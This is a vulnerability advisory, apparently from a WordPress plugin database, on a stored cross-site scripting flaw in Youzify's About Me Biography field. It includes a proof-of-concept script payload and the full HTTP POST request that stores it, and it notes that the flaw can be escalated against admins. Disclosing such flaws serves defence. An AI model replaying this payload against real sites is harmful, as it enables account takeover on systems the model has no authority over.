WordPress Plugin Vulnerabilities
Youzify < 1.0.7 - Stored Cross-Site Scripting via Biography
Description
The About Me widget of the plugin does not properly sanitise its Biography field, allowing any authenticated user to set Cross-Site Scripting payloads in it, which will be executed when viewing the affected user profile. This could allow a low privilege user to gain unauthorised access to the admin side of the blog by targeting an admin, inducing them to view their profile with a malicious payload adding a rogue account for example.
Proof of Concept
Log on as any user, go to the 'About me' widget section of your profile (https://example.com/members/<you username>/widgets/about_me/) and set the following payload in the Biography field: <script>alert(/XSS/)</script> Then view the profile (either as yourself or any other user) to trigger the XSS (https://example.com/members/<username>/) POST /members/user1/widgets/about_me/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------330784649142342642204053017225 Content-Length: 1288 Connection: close Cookie: [your user cookies] Upgrade-Insecure-Requests: 1 -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="upload_youzify_wg_about_me_photo"; filename="" Content-Type: application/octet-stream -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_photo]" -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_title]" User1 -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_desc]" -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_bio]" XSS here <script>alert(/XSS/)</script> -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="action" youzify_profile_settings_save_data -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="security" 318e0fbc53 -----------------------------330784649142342642204053017225 Content-Disposition: form-data; name="save" -----------------------------330784649142342642204053017225--
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)